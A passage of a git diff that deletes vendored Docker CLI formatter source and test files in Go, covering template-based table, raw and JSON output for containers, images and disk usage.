-		t.Fatalf("Expected an empty string, was %s", label)
-	}
-
-	ctx = containerContext{c: c2, trunc: true}
-	FullHeader := ctx.FullHeader()
-	if FullHeader != "" {
-		t.Fatalf("Expected FullHeader to be empty, was %s", FullHeader)
-	}
-
-}
-
-func TestContainerContextWrite(t *testing.T) {
-	unixTime := time.Now().AddDate(0, 0, -1).Unix()
-	expectedTime := time.Unix(unixTime, 0).String()
-
-	cases := []struct {
-		context  Context
-		expected string
-	}{
-		// Errors
-		{
-			Context{Format: "{{InvalidFunction}}"},
-			`Template parsing error: template: :1: function "InvalidFunction" not defined
-`,
-		},
-		{
-			Context{Format: "{{nil}}"},
-			`Template parsing error: template: :1:2: executing "" at <nil>: nil is not a command
-`,
-		},
-		// Table Format
-		{
-			Context{Format: NewContainerFormat("table", false, true)},
-			`CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES               SIZE
-containerID1        ubuntu              ""                  24 hours ago                                                foobar_baz          0 B
-containerID2        ubuntu              ""                  24 hours ago                                                foobar_bar          0 B
-`,
-		},
-		{
-			Context{Format: NewContainerFormat("table", false, false)},
-			`CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
-containerID1        ubuntu              ""                  24 hours ago                                                foobar_baz
-containerID2        ubuntu              ""                  24 hours ago                                                foobar_bar
-`,
-		},
-		{
-			Context{Format: NewContainerFormat("table {{.Image}}", false, false)},
-			"IMAGE\nubuntu\nubuntu\n",
-		},
-		{
-			Context{Format: NewContainerFormat("table {{.Image}}", false, true)},
-			"IMAGE\nubuntu\nubuntu\n",
-		},
-		{
-			Context{Format: NewContainerFormat("table {{.Image}}", true, false)},
-			"IMAGE\nubuntu\nubuntu\n",
-		},
-		{
-			Context{Format: NewContainerFormat("table", true, false)},
-			"containerID1\ncontainerID2\n",
-		},
-		// Raw Format
-		{
-			Context{Format: NewContainerFormat("raw", false, false)},
-			fmt.Sprintf(`container_id: containerID1
-image: ubuntu
-command: ""
-created_at: %s
-status:
-names: foobar_baz
-labels:
-ports:
-
-container_id: containerID2
-image: ubuntu
-command: ""
-created_at: %s
-status:
-names: foobar_bar
-labels:
-ports:
-
-`, expectedTime, expectedTime),
-		},
-		{
-			Context{Format: NewContainerFormat("raw", false, true)},
-			fmt.Sprintf(`container_id: containerID1
-image: ubuntu
-command: ""
-created_at: %s
-status:
-names: foobar_baz
-labels:
-ports:
-size: 0 B
-
-container_id: containerID2
-image: ubuntu
-command: ""
-created_at: %s
-status:
-names: foobar_bar
-labels:
-ports:
-size: 0 B
-
-`, expectedTime, expectedTime),
-		},
-		{
-			Context{Format: NewContainerFormat("raw", true, false)},
-			"container_id: containerID1\ncontainer_id: containerID2\n",
-		},
-		// Custom Format
-		{
-			Context{Format: "{{.Image}}"},
-			"ubuntu\nubuntu\n",
-		},
-		{
-			Context{Format: NewContainerFormat("{{.Image}}", false, true)},
-			"ubuntu\nubuntu\n",
-		},
-	}
-
-	for _, testcase := range cases {
-		containers := []types.Container{
-			{ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unixTime},
-			{ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unixTime},
-		}
-		out := bytes.NewBufferString("")
-		testcase.context.Output = out
-		err := ContainerWrite(testcase.context, containers)
-		if err != nil {
-			assert.Error(t, err, testcase.expected)
-		} else {
-			assert.Equal(t, out.String(), testcase.expected)
-		}
-	}
-}
-
-func TestContainerContextWriteWithNoContainers(t *testing.T) {
-	out := bytes.NewBufferString("")
-	containers := []types.Container{}
-
-	contexts := []struct {
-		context  Context
-		expected string
-	}{
-		{
-			Context{
-				Format: "{{.Image}}",
-				Output: out,
-			},
-			"",
-		},
-		{
-			Context{
-				Format: "table {{.Image}}",
-				Output: out,
-			},
-			"IMAGE\n",
-		},
-		{
-			Context{
-				Format: NewContainerFormat("{{.Image}}", false, true),
-				Output: out,
-			},
-			"",
-		},
-		{
-			Context{
-				Format: NewContainerFormat("table {{.Image}}", false, true),
-				Output: out,
-			},
-			"IMAGE\n",
-		},
-		{
-			Context{
-				Format: "table {{.Image}}\t{{.Size}}",
-				Output: out,
-			},
-			"IMAGE               SIZE\n",
-		},
-		{
-			Context{
-				Format: NewContainerFormat("table {{.Image}}\t{{.Size}}", false, true),
-				Output: out,
-			},
-			"IMAGE               SIZE\n",
-		},
-	}
-
-	for _, context := range contexts {
-		ContainerWrite(context.context, containers)
-		assert.Equal(t, context.expected, out.String())
-		// Clean buffer
-		out.Reset()
-	}
-}
-
-func TestContainerContextWriteJSON(t *testing.T) {
-	unix := time.Now().Add(-65 * time.Second).Unix()
-	containers := []types.Container{
-		{ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unix},
-		{ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unix},
-	}
-	expectedCreated := time.Unix(unix, 0).String()
-	expectedJSONs := []map[string]interface{}{
-		{"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID1", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_baz", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""},
-		{"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID2", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_bar", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""},
-	}
-	out := bytes.NewBufferString("")
-	err := ContainerWrite(Context{Format: "{{json .}}", Output: out}, containers)
-	if err != nil {
-		t.Fatal(err)
-	}
-	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
-		t.Logf("Output: line %d: %s", i, line)
-		var m map[string]interface{}
-		if err := json.Unmarshal([]byte(line), &m); err != nil {
-			t.Fatal(err)
-		}
-		assert.DeepEqual(t, m, expectedJSONs[i])
-	}
-}
-
-func TestContainerContextWriteJSONField(t *testing.T) {
-	containers := []types.Container{
-		{ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu"},
-		{ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu"},
-	}
-	out := bytes.NewBufferString("")
-	err := ContainerWrite(Context{Format: "{{json .ID}}", Output: out}, containers)
-	if err != nil {
-		t.Fatal(err)
-	}
-	for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") {
-		t.Logf("Output: line %d: %s", i, line)
-		var s string
-		if err := json.Unmarshal([]byte(line), &s); err != nil {
-			t.Fatal(err)
-		}
-		assert.Equal(t, s, containers[i].ID)
-	}
-}
-
-func TestContainerBackCompat(t *testing.T) {
-	containers := []types.Container{{ID: "brewhaha"}}
-	cases := []string{
-		"ID",
-		"Names",
-		"Image",
-		"Command",
-		"CreatedAt",
-		"RunningFor",
-		"Ports",
-		"Status",
-		"Size",
-		"Labels",
-		"Mounts",
-	}
-	buf := bytes.NewBuffer(nil)
-	for _, c := range cases {
-		ctx := Context{Format: Format(fmt.Sprintf("{{ .%s }}", c)), Output: buf}
-		if err := ContainerWrite(ctx, containers); err != nil {
-			t.Logf("could not render template for field '%s': %v", c, err)
-			t.Fail()
-		}
-		buf.Reset()
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom.go b/vendor/github.com/docker/docker/cli/command/formatter/custom.go
deleted file mode 100644
index df32684429..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/custom.go
+++ /dev/null
@@ -1,51 +0,0 @@
-package formatter
-
-import (
-	"strings"
-)
-
-const (
-	imageHeader        = "IMAGE"
-	createdSinceHeader = "CREATED"
-	createdAtHeader    = "CREATED AT"
-	sizeHeader         = "SIZE"
-	labelsHeader       = "LABELS"
-	nameHeader         = "NAME"
-	driverHeader       = "DRIVER"
-	scopeHeader        = "SCOPE"
-)
-
-type subContext interface {
-	FullHeader() string
-	AddHeader(header string)
-}
-
-// HeaderContext provides the subContext interface for managing headers
-type HeaderContext struct {
-	header []string
-}
-
-// FullHeader returns the header as a string
-func (c *HeaderContext) FullHeader() string {
-	if c.header == nil {
-		return ""
-	}
-	return strings.Join(c.header, "\t")
-}
-
-// AddHeader adds another column to the header
-func (c *HeaderContext) AddHeader(header string) {
-	if c.header == nil {
-		c.header = []string{}
-	}
-	c.header = append(c.header, strings.ToUpper(header))
-}
-
-func stripNamePrefix(ss []string) []string {
-	sss := make([]string, len(ss))
-	for i, s := range ss {
-		sss[i] = s[1:]
-	}
-
-	return sss
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go b/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go
deleted file mode 100644
index da42039dca..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go
+++ /dev/null
@@ -1,28 +0,0 @@
-package formatter
-
-import (
-	"reflect"
-	"strings"
-	"testing"
-)
-
-func compareMultipleValues(t *testing.T, value, expected string) {
-	// comma-separated values means probably a map input, which won't
-	// be guaranteed to have the same order as our expected value
-	// We'll create maps and use reflect.DeepEquals to check instead:
-	entriesMap := make(map[string]string)
-	expMap := make(map[string]string)
-	entries := strings.Split(value, ",")
-	expectedEntries := strings.Split(expected, ",")
-	for _, entry := range entries {
-		keyval := strings.Split(entry, "=")
-		entriesMap[keyval[0]] = keyval[1]
-	}
-	for _, expected := range expectedEntries {
-		keyval := strings.Split(expected, "=")
-		expMap[keyval[0]] = keyval[1]
-	}
-	if !reflect.DeepEqual(expMap, entriesMap) {
-		t.Fatalf("Expected entries: %v, got: %v", expected, value)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go b/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go
deleted file mode 100644
index 5309d880a5..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go
+++ /dev/null
@@ -1,334 +0,0 @@
-package formatter
-
-import (
-	"bytes"
-	"fmt"
-	"strings"
-	"text/template"
-
-	"github.com/docker/distribution/reference"
-	"github.com/docker/docker/api/types"
-	units "github.com/docker/go-units"
-)
-
-const (
-	defaultDiskUsageImageTableFormat     = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.VirtualSize}}\t{{.SharedSize}}\t{{.UniqueSize}}\t{{.Containers}}"
-	defaultDiskUsageContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.LocalVolumes}}\t{{.Size}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Names}}"
-	defaultDiskUsageVolumeTableFormat    = "table {{.Name}}\t{{.Links}}\t{{.Size}}"
-	defaultDiskUsageTableFormat          = "table {{.Type}}\t{{.TotalCount}}\t{{.Active}}\t{{.Size}}\t{{.Reclaimable}}"
-
-	typeHeader        = "TYPE"
-	totalHeader       = "TOTAL"
-	activeHeader      = "ACTIVE"
-	reclaimableHeader = "RECLAIMABLE"
-	containersHeader  = "CONTAINERS"
-	sharedSizeHeader  = "SHARED SIZE"
-	uniqueSizeHeader  = "UNIQUE SiZE"
-)
-
-// DiskUsageContext contains disk usage specific information required by the formater, encapsulate a Context struct.
-type DiskUsageContext struct {
-	Context
-	Verbose    bool
-	LayersSize int64
-	Images     []*types.ImageSummary
-	Containers []*types.Container
-	Volumes    []*types.Volume
-}
-
-func (ctx *DiskUsageContext) startSubsection(format string) (*template.Template, error) {
-	ctx.buffer = bytes.NewBufferString("")
-	ctx.header = ""
-	ctx.Format = Format(format)
-	ctx.preFormat()
-
-	return ctx.parseFormat()
-}
-
-func (ctx *DiskUsageContext) Write() {
-	if ctx.Verbose == false {
-		ctx.buffer = bytes.NewBufferString("")
-		ctx.Format = defaultDiskUsageTableFormat
-		ctx.preFormat()
-
-		tmpl, err := ctx.parseFormat()
-		if err != nil {
-			return
-		}
-
-		err = ctx.contextFormat(tmpl, &diskUsageImagesContext{
-			totalSize: ctx.LayersSize,
-			images:    ctx.Images,
-		})
-		if err != nil {
-			return
-		}
-		err = ctx.contextFormat(tmpl, &diskUsageContainersContext{
-			containers: ctx.Containers,
-		})
-		if err != nil {
-			return
-		}
-
-		err = ctx.contextFormat(tmpl, &diskUsageVolumesContext{
-			volumes: ctx.Volumes,
-		})
-		if err != nil {
-			return
-		}
-
-		ctx.postFormat(tmpl, &diskUsageContainersContext{containers: []*types.Container{}})
-
-		return
-	}
-
-	// First images
-	tmpl, err := ctx.startSubsection(defaultDiskUsageImageTableFormat)
-	if err != nil {
-		return
-	}
-
-	ctx.Output.Write([]byte("Images space usage:\n\n"))
-	for _, i := range ctx.Images {
-		repo := "<none>"
-		tag := "<none>"
-		if len(i.RepoTags) > 0 && !isDangling(*i) {
-			// Only show the first tag
-			ref, err := reference.ParseNamed(i.RepoTags[0])
-			if err != nil {
-				continue
-			}
-			if nt, ok := ref.(reference.NamedTagged); ok {
-				repo = ref.Name()
-				tag = nt.Tag()
-			}
-		}
-
-		err = ctx.contextFormat(tmpl, &imageContext{
-			repo:  repo,
-			tag:   tag,
-			trunc: true,
-			i:     *i,
-		})
-		if err != nil {
-			return
-		}
-	}
-	ctx.postFormat(tmpl, &imageContext{})
-
-	// Now containers
-	ctx.Output.Write([]byte("\nContainers space usage:\n\n"))
-	tmpl, err = ctx.startSubsection(defaultDiskUsageContainerTableFormat)
-	if err != nil {
-		return
-	}
-	for _, c := range ctx.Containers {
-		// Don't display the virtual size
-		c.SizeRootFs = 0
-		err = ctx.contextFormat(tmpl, &containerContext{
-			trunc: true,
-			c:     *c,
-		})
-		if err != nil {
-			return
-		}
-	}
-	ctx.postFormat(tmpl, &containerContext{})
-
-	// And volumes
-	ctx.Output.Write([]byte("\nLocal Volumes space usage:\n\n"))
-	tmpl, err = ctx.startSubsection(defaultDiskUsageVolumeTableFormat)
-	if err != nil {
-		return
-	}
-	for _, v := range ctx.Volumes {
-		err = ctx.contextFormat(tmpl, &volumeContext{
-			v: *v,
-		})
-		if err != nil {
-			return
-		}
-	}
-	ctx.postFormat(tmpl, &volumeContext{v: types.Volume{}})
-}
-
-type diskUsageImagesContext struct {
-	HeaderContext
-	totalSize int64
-	images    []*types.ImageSummary
-}
-
-func (c *diskUsageImagesContext) Type() string {
-	c.AddHeader(typeHeader)
-	return "Images"
-}
-
-func (c *diskUsageImagesContext) TotalCount() string {
-	c.AddHeader(totalHeader)
-	return fmt.Sprintf("%d", len(c.images))
-}
-
-func (c *diskUsageImagesContext) Active() string {
-	c.AddHeader(activeHeader)
-	used := 0
-	for _, i := range c.images {
-		if i.Containers > 0 {
-			used++
-		}
-	}
-
-	return fmt.Sprintf("%d", used)
-}
-
-func (c *diskUsageImagesContext) Size() string {
-	c.AddHeader(sizeHeader)
-	return units.HumanSize(float64(c.totalSize))
-
-}
-
-func (c *diskUsageImagesContext) Reclaimable() string {
-	var used int64
-
-	c.AddHeader(reclaimableHeader)
-	for _, i := range c.images {
-		if i.Containers != 0 {
-			if i.VirtualSize == -1 || i.SharedSize == -1 {
-				continue
-			}
-			used += i.VirtualSize - i.SharedSize
-		}
-	}
-
-	reclaimable := c.totalSize - used
-	if c.totalSize > 0 {
-		return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/c.totalSize)
-	}
-	return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable)))
-}
-
-type diskUsageContainersContext struct {
-	HeaderContext
-	verbose    bool
-	containers []*types.Container
-}
-
-func (c *diskUsageContainersContext) Type() string {
-	c.AddHeader(typeHeader)
-	return "Containers"
-}
-
-func (c *diskUsageContainersContext) TotalCount() string {
-	c.AddHeader(totalHeader)
-	return fmt.Sprintf("%d", len(c.containers))
-}
-
-func (c *diskUsageContainersContext) isActive(container types.Container) bool {
-	return strings.Contains(container.State, "running") ||
-		strings.Contains(container.State, "paused") ||
-		strings.Contains(container.State, "restarting")
-}
-
-func (c *diskUsageContainersContext) Active() string {
-	c.AddHeader(activeHeader)
-	used := 0
-	for _, container := range c.containers {
-		if c.isActive(*container) {
-			used++
-		}
-	}
-
-	return fmt.Sprintf("%d", used)
-}
-
-func (c *diskUsageContainersContext) Size() string {
-	var size int64
-
-	c.AddHeader(sizeHeader)
-	for _, container := range c.containers {
-		size += container.SizeRw
-	}
-
-	return units.HumanSize(float64(size))
-}
-
-func (c *diskUsageContainersContext) Reclaimable() string {
-	var reclaimable int64
-	var totalSize int64
-
-	c.AddHeader(reclaimableHeader)
-	for _, container := range c.containers {
-		if !c.isActive(*container) {
-			reclaimable += container.SizeRw
-		}
-		totalSize += container.SizeRw
-	}
-
-	if totalSize > 0 {
-		return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize)
-	}
-
-	return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable)))
-}
-
-type diskUsageVolumesContext struct {
-	HeaderContext
-	verbose bool
-	volumes []*types.Volume
-}
-
-func (c *diskUsageVolumesContext) Type() string {
-	c.AddHeader(typeHeader)
-	return "Local Volumes"
-}
-
-func (c *diskUsageVolumesContext) TotalCount() string {
-	c.AddHeader(totalHeader)
-	return fmt.Sprintf("%d", len(c.volumes))
-}
-
-func (c *diskUsageVolumesContext) Active() string {
-	c.AddHeader(activeHeader)
-
-	used := 0
-	for _, v := range c.volumes {
-		if v.UsageData.RefCount > 0 {
-			used++
-		}
-	}
-
-	return fmt.Sprintf("%d", used)
-}
-
-func (c *diskUsageVolumesContext) Size() string {
-	var size int64
-
-	c.AddHeader(sizeHeader)
-	for _, v := range c.volumes {
-		if v.UsageData.Size != -1 {
-			size += v.UsageData.Size
-		}
-	}
-
-	return units.HumanSize(float64(size))
-}
-
-func (c *diskUsageVolumesContext) Reclaimable() string {
-	var reclaimable int64
-	var totalSize int64
-
-	c.AddHeader(reclaimableHeader)
-	for _, v := range c.volumes {
-		if v.UsageData.Size != -1 {
-			if v.UsageData.RefCount == 0 {
-				reclaimable += v.UsageData.Size
-			}
-			totalSize += v.UsageData.Size
-		}
-	}
-
-	if totalSize > 0 {
-		return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize)
-	}
-
-	return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable)))
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/formatter.go b/vendor/github.com/docker/docker/cli/command/formatter/formatter.go
deleted file mode 100644
index e859a1ca26..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/formatter.go
+++ /dev/null
@@ -1,123 +0,0 @@
-package formatter
-
-import (
-	"bytes"
-	"fmt"
-	"io"
-	"strings"
-	"text/tabwriter"
-	"text/template"
-
-	"github.com/docker/docker/utils/templates"
-)
-
-// Format keys used to specify certain kinds of output formats
-const (
-	TableFormatKey  = "table"
-	RawFormatKey    = "raw"
-	PrettyFormatKey = "pretty"
-
-	defaultQuietFormat = "{{.ID}}"
-)
-
-// Format is the format string rendered using the Context
-type Format string
-
-// IsTable returns true if the format is a table-type format
-func (f Format) IsTable() bool {
-	return strings.HasPrefix(string(f), TableFormatKey)
-}
-
-// Contains returns true if the format contains the substring
-func (f Format) Contains(sub string) bool {
-	return strings.Contains(string(f), sub)
-}
-
-// Context contains information required by the formatter to print the output as desired.
-type Context struct {
-	// Output is the output stream to which the formatted string is written.
-	Output io.Writer
-	// Format is used to choose raw, table or custom format for the output.
-	Format Format
-	// Trunc when set to true will truncate the output of certain fields such as Container ID.
-	Trunc bool
-
-	// internal element
-	finalFormat string
-	header      string
-	buffer      *bytes.Buffer
-}
-
-func (c *Context) preFormat() {
-	c.finalFormat = string(c.Format)
-
-	// TODO: handle this in the Format type
-	if c.Format.IsTable() {
-		c.finalFormat = c.finalFormat[len(TableFormatKey):]
-	}
-
-	c.finalFormat = strings.Trim(c.finalFormat, " ")
-	r := strings.NewReplacer(`\t`, "\t", `\n`, "\n")
-	c.finalFormat = r.Replace(c.finalFormat)
-}
-
-func (c *Context) parseFormat() (*template.Template, error) {
-	tmpl, err := templates.Parse(c.finalFormat)
-	if err != nil {
-		return tmpl, fmt.Errorf("Template parsing error: %v\n", err)
-	}
-	return tmpl, err
-}
-
-func (c *Context) postFormat(tmpl *template.Template, subContext subContext) {
-	if c.Format.IsTable() {
-		if len(c.header) == 0 {
-			// if we still don't have a header, we didn't have any containers so we need to fake it to get the right headers from the template
-			tmpl.Execute(bytes.NewBufferString(""), subContext)
-			c.header = subContext.FullHeader()
-		}
-
-		t := tabwriter.NewWriter(c.Output, 20, 1, 3, ' ', 0)
-		t.Write([]byte(c.header))
-		t.Write([]byte("\n"))
-		c.buffer.WriteTo(t)
-		t.Flush()
-	} else {
-		c.buffer.WriteTo(c.Output)
-	}
-}
-
-func (c *Context) contextFormat(tmpl *template.Template, subContext subContext) error {
-	if err := tmpl.Execute(c.buffer, subContext); err != nil {
-		return fmt.Errorf("Template parsing error: %v\n", err)
-	}
-	if c.Format.IsTable() && len(c.header) == 0 {
-		c.header = subContext.FullHeader()
-	}
-	c.buffer.WriteString("\n")
-	return nil
-}
-
-// SubFormat is a function type accepted by Write()
-type SubFormat func(func(subContext) error) error
-
-// Write the template to the buffer using this Context
-func (c *Context) Write(sub subContext, f SubFormat) error {
-	c.buffer = bytes.NewBufferString("")
-	c.preFormat()
-
-	tmpl, err := c.parseFormat()
-	if err != nil {
-		return err
-	}
-
-	subFormat := func(subContext subContext) error {
-		return c.contextFormat(tmpl, subContext)
-	}
-	if err := f(subFormat); err != nil {
-		return err
-	}
-
-	c.postFormat(tmpl, sub)
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image.go b/vendor/github.com/docker/docker/cli/command/formatter/image.go
deleted file mode 100644
index 5c7de826f0..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/image.go
+++ /dev/null
@@ -1,259 +0,0 @@
-package formatter
-
-import (
-	"fmt"
-	"time"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/reference"
-	units "github.com/docker/go-units"
-)
-
-const (
-	defaultImageTableFormat           = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}"
-	defaultImageTableFormatWithDigest = "table {{.Repository}}\t{{.Tag}}\t{{.Digest}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}"
-
-	imageIDHeader    = "IMAGE ID"
-	repositoryHeader = "REPOSITORY"
-	tagHeader        = "TAG"
-	digestHeader     = "DIGEST"
-)
-
-// ImageContext contains image specific information required by the formater, encapsulate a Context struct.
-type ImageContext struct {
-	Context
-	Digest bool
-}
-
-func isDangling(image types.ImageSummary) bool {
-	return len(image.RepoTags) == 1 && image.RepoTags[0] == "<none>:<none>" && len(image.RepoDigests) == 1 && image.RepoDigests[0] == "<none>@<none>"
-}
-
-// NewImageFormat returns a format for rendering an ImageContext
-func NewImageFormat(source string, quiet bool, digest bool) Format {
-	switch source {
-	case TableFormatKey:
-		switch {
-		case quiet:
-			return defaultQuietFormat
-		case digest:
-			return defaultImageTableFormatWithDigest
-		default:
-			return defaultImageTableFormat
-		}
-	case RawFormatKey:
-		switch {
-		case quiet:
-			return `image_id: {{.ID}}`
-		case digest:
-			return `repository: {{ .Repository }}
-tag: {{.Tag}}
-digest: {{.Digest}}
-image_id: {{.ID}}
-created_at: {{.CreatedAt}}
-virtual_size: {{.Size}}
-`
-		default:
-			return `repository: {{ .Repository }}
-tag: {{.Tag}}
-image_id: {{.ID}}
-created_at: {{.CreatedAt}}
-virtual_size: {{.Size}}
-`
-		}
-	}
-
-	format := Format(source)
-	if format.IsTable() && digest && !format.Contains("{{.Digest}}") {
-		format += "\t{{.Digest}}"
-	}
-	return format
-}
-
-// ImageWrite writes the formatter images using the ImageContext
-func ImageWrite(ctx ImageContext, images []types.ImageSummary) error {
-	render := func(format func(subContext subContext) error) error {
-		return imageFormat(ctx, images, format)
-	}
-	return ctx.Write(&imageContext{}, render)
-}
-
-func imageFormat(ctx ImageContext, images []types.ImageSummary, format func(subContext subContext) error) error {
-	for _, image := range images {
-		images := []*imageContext{}
-		if isDangling(image) {
-			images = append(images, &imageContext{
-				trunc:  ctx.Trunc,
-				i:      image,
-				repo:   "<none>",
-				tag:    "<none>",
-				digest: "<none>",
-			})
-		} else {
-			repoTags := map[string][]string{}
-			repoDigests := map[string][]string{}
-
-			for _, refString := range append(image.RepoTags) {
-				ref, err := reference.ParseNamed(refString)
-				if err != nil {
-					continue
-				}
-				if nt, ok := ref.(reference.NamedTagged); ok {
-					repoTags[ref.Name()] = append(repoTags[ref.Name()], nt.Tag())
-				}
-			}
-			for _, refString := range append(image.RepoDigests) {
-				ref, err := reference.ParseNamed(refString)
-				if err != nil {
-					continue
-				}
-				if c, ok := ref.(reference.Canonical); ok {
-					repoDigests[ref.Name()] = append(repoDigests[ref.Name()], c.Digest().String())
-				}
-			}
-
-			for repo, tags := range repoTags {
-				digests := repoDigests[repo]
-
-				// Do not display digests as their own row
-				delete(repoDigests, repo)
-
-				if !ctx.Digest {
-					// Ignore digest references, just show tag once
-					digests = nil
-				}
-
-				for _, tag := range tags {
-					if len(digests) == 0 {
-						images = append(images, &imageContext{
-							trunc:  ctx.Trunc,
-							i:      image,
-							repo:   repo,
-							tag:    tag,
-							digest: "<none>",
-						})
-						continue
-					}
-					// Display the digests for each tag
-					for _, dgst := range digests {
-						images = append(images, &imageContext{
-							trunc:  ctx.Trunc,
-							i:      image,
-							repo:   repo,
-							tag:    tag,
-							digest: dgst,
-						})
-					}
-
-				}
-			}
-
-			// Show rows for remaining digest only references
-			for repo, digests := range repoDigests {
-				// If digests are displayed, show row per digest
-				if ctx.Digest {
-					for _, dgst := range digests {
-						images = append(images, &imageContext{
-							trunc:  ctx.Trunc,
-							i:      image,
-							repo:   repo,
-							tag:    "<none>",
-							digest: dgst,
-						})
-					}
-				} else {
-					images = append(images, &imageContext{
-						trunc: ctx.Trunc,
-						i:     image,
-						repo:  repo,
-						tag:   "<none>",
-					})
-				}
-			}
-		}
-		for _, imageCtx := range images {
-			if err := format(imageCtx); err != nil {
-				return err
-			}
-		}
-	}
-	return nil
-}
-
-type imageContext struct {
-	HeaderContext
-	trunc  bool
-	i      types.ImageSummary
-	repo   string
-	tag    string
-	digest string
-}
-
-func (c *imageContext) ID() string {
-	c.AddHeader(imageIDHeader)
-	if c.trunc {
-		return stringid.TruncateID(c.i.ID)
-	}
-	return c.i.ID
-}
-
-func (c *imageContext) Repository() string {
-	c.AddHeader(repositoryHeader)
-	return c.repo
-}
-
-func (c *imageContext) Tag() string {
-	c.AddHeader(tagHeader)
-	return c.tag
-}
-
-func (c *imageContext) Digest() string {
-	c.AddHeader(digestHeader)
-	return c.digest
-}
-
-func (c *imageContext) CreatedSince() string {
-	c.AddHeader(createdSinceHeader)
-	createdAt := time.Unix(int64(c.i.Created), 0)
-	return units.HumanDuration(time.Now().UTC().Sub(createdAt))
-}
-
-func (c *imageContext) CreatedAt() string {
-	c.AddHeader(createdAtHeader)
-	return time.Unix(int64(c.i.Created), 0).String()
-}
-
-func (c *imageContext) Size() string {
-	c.AddHeader(sizeHeader)
-	return units.HumanSizeWithPrecision(float64(c.i.Size), 3)
-}
-
-func (c *imageContext) Containers() string {
-	c.AddHeader(containersHeader)
-	if c.i.Containers == -1 {
-		return "N/A"
-	}
-	return fmt.Sprintf("%d", c.i.Containers)
-}
-
-func (c *imageContext) VirtualSize() string {
-	c.AddHeader(sizeHeader)
-	return units.HumanSize(float64(c.i.VirtualSize))
-}
-
-func (c *imageContext) SharedSize() string {
-	c.AddHeader(sharedSizeHeader)
-	if c.i.SharedSize == -1 {
-		return "N/A"
-	}
-	return units.HumanSize(float64(c.i.SharedSize))
-}
-
-func (c *imageContext) UniqueSize() string {
-	c.AddHeader(uniqueSizeHeader)
-	if c.i.VirtualSize == -1 || c.i.SharedSize == -1 {
-		return "N/A"
-	}
-	return units.HumanSize(float64(c.i.VirtualSize - c.i.SharedSize))
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image_test.go b/vendor/github.com/docker/docker/cli/command/formatter/image_test.go
deleted file mode 100644
index ffe77f6677..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/image_test.go
+++ /dev/null
@@ -1,333 +0,0 @@
-package formatter
-
-import (
-	"bytes"
-	"fmt"
-	"strings"
-	"testing"
-	"time"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestImageContext(t *testing.T) {
-	imageID := stringid.GenerateRandomID()
-	unix := time.Now().Unix()
-
-	var ctx imageContext
-	cases := []struct {
-		imageCtx  imageContext
-		expValue  string
-		expHeader string
-		call      func() string
-	}{
-		{imageContext{
-			i:     types.ImageSummary{ID: imageID},
-			trunc: true,
-		}, stringid.TruncateID(imageID), imageIDHeader, ctx.ID},
-		{imageContext{
-			i:     types.ImageSummary{ID: imageID},
-			trunc: false,
-		}, imageID, imageIDHeader, ctx.ID},
-		{imageContext{
-			i:     types.ImageSummary{Size: 10, VirtualSize: 10},
-			trunc: true,
-		}, "10 B", sizeHeader, ctx.Size},
-		{imageContext{
-			i:     types.ImageSummary{Created: unix},
-			trunc: true,
-		}, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt},
-		// FIXME
-		// {imageContext{
-		// 	i:     types.ImageSummary{Created: unix},
-		// 	trunc: true,
-		// }, units.HumanDuration(time.Unix(unix, 0)), createdSinceHeader, ctx.CreatedSince},
-		{imageContext{
-			i:    types.ImageSummary{},
-			repo: "busybox",
-		}, "busybox", repositoryHeader, ctx.Repository},
-		{imageContext{
-			i:   types.ImageSummary{},
-			tag: "latest",
-		}, "latest", tagHeader, ctx.Tag},
